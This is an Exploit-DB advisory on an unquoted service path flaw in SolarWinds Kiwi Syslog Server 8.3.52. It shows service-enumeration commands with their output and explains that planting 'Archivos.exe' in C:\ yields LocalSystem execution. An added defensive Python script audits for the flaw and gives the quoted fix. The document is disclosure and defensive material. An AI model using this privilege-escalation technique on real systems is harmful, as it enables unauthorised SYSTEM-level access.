SolarWinds Kiwi Syslog Server 8.3.52 – ‘Kiwi Syslog Server’ Unquoted Service Path

  • Author: Carlos A Garcia R
    Date: 2019-11-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47599/
  • # Exploit Title: SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path
    # Date: 2019-11-08
    # Exploit Author: Carlos A Garcia R
    # Vendor Homepage: https://www.kiwisyslog.com/
    # Software Link: https://www.kiwisyslog.com/downloads
    # Version: 8.3.52
    # Tested on: Windows XP Professional Service Pack 3
    
    # Description:
    # SolarWinds Kiwi Syslog Server 8.3.52 is affordable software for managing syslog messages, SNMP traps, and Windows event logs
    
    # PoC:
    
    # C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
    
    Kiwi Syslog Server	Kiwi Syslog Server	C:\Archivos de programa\Syslogd\Syslogd_Service.exe	Auto
    
    # C:\>sc qc "Kiwi Syslog Server"
    [SC] GetServiceConfig SUCCESS
    
    SERVICE_NAME: Kiwi Syslog Server
    TYPE : 10  WIN32_OWN_PROCESS
    START_TYPE : 2 AUTO_START
    ERROR_CONTROL: 1 NORMAL
    BINARY_PATH_NAME : C:\Archivos de programa\Syslogd\Syslogd_Service.exe
    LOAD_ORDER_GROUP :
    TAG: 0
    DISPLAY_NAME : Kiwi Syslog Server
    DEPENDENCIES :
    SERVICE_START_NAME : LocalSystem
    
     
    # Exploit
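    Because the BINARY_PATH_NAME listed above contains spaces and is not enclosed
    in quotes, Windows tries each space-delimited prefix of the path as an
    executable when it starts the service. An executable named "Archivos.exe"
    could therefore be placed in "C:\", and it would be executed as the Local
    System user the next time the service was restarted.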
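
A defender-side audit for the condition shown above, as an added example that is not part of the original advisory: it takes service name and PathName pairs (as `wmic service get name,pathname` reports them), flags unquoted paths containing spaces, lists the locations whose write permissions should be reviewed, and gives the quoted form the service path should have. The function names, the two extra sample rows and the "path ends at the first .exe" split are assumptions of this example.

```python
import ntpath
import re

# Constructed sample rows (service name, PathName). The first is the value on
# this page; the other two are made up to show paths that are not affected.
SAMPLE = [
    ("Kiwi Syslog Server", r"C:\Archivos de programa\Syslogd\Syslogd_Service.exe"),
    ("QuotedSvc", r'"C:\Program Files\Vendor\svc.exe" -k run'),
    ("NoSpaceSvc", r"C:\Windows\system32\svchost.exe -k netsvcs"),
]

EXE_END = re.compile(r"\.exe\b", re.IGNORECASE)

def split_image_path(pathname):
    """Split a service PathName into (executable, arguments, was_quoted)."""
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        if end == -1:                      # unbalanced quote: take the rest
            return p[1:], "", True
        return p[1:end], p[end + 1:].strip(), True
    m = EXE_END.search(p)                  # assumption: path ends at first ".exe"
    if m:
        return p[:m.end()], p[m.end():].strip(), False
    return p, "", False

def earlier_candidates(exe):
    """Files Windows tries before the real binary when the path is unquoted."""
    parts = exe.split(" ")
    out = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        # ".exe" is appended only when the candidate has no extension
        out.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
    return out

def audit(services):
    """Return one finding per unquoted service path that contains a space."""
    findings = []
    for name, pathname in services:
        exe, args, quoted = split_image_path(pathname)
        if quoted or " " not in exe:
            continue
        fixed = f'"{exe}"' + (f" {args}" if args else "")
        findings.append({"service": name, "check_acl_on": earlier_candidates(exe),
                         "quoted_path": fixed})
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

Setting the service's binary path to the `quoted_path` value removes the ambiguity, so none of the `check_acl_on` locations are tried.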